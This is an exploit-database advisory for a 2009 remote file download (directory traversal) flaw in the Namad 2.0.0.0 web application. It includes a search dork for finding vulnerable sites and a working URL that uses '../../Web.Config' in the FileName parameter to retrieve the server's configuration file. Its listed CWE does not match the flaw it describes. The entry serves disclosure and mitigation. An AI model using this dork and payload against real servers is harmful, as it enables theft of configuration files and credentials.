Remote File Download Vulnerability

vendor:

Namad

by:

Securitylab.ir

6,4

CVSS

MEDIUM

Remote File Download Vulnerability

434

CWE

Product Name: Namad

Affected Version From: 2.0.0.0

Affected Version To: 2.0.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:imenafzar:namad:2.0.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote File Download Vulnerability

A remote file download vulnerability exists in Namad version 2.0.0.0. An attacker can exploit this vulnerability to download sensitive files from the server. The vulnerability is present in the SecureDownloads.aspx page, which allows an attacker to download any file from the server by manipulating the FileName parameter.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks. Validate user input and ensure that the application does not accept any malicious input.

Source

Exploit-DB raw data:

######################### Securitylab.ir ########################
# Application Info:
# Name: Namad
# Version: 2.0.0.0
# Website: http://imenafzar.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
# Dork: "Copyright 2008 ImenAfzar ver :2.0.0.0"
#===========================================================
# http://site.ir/SecureDownloads.aspx?Mode=Downloads&Type=Files&FileName=../../Web.Config
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-05-19]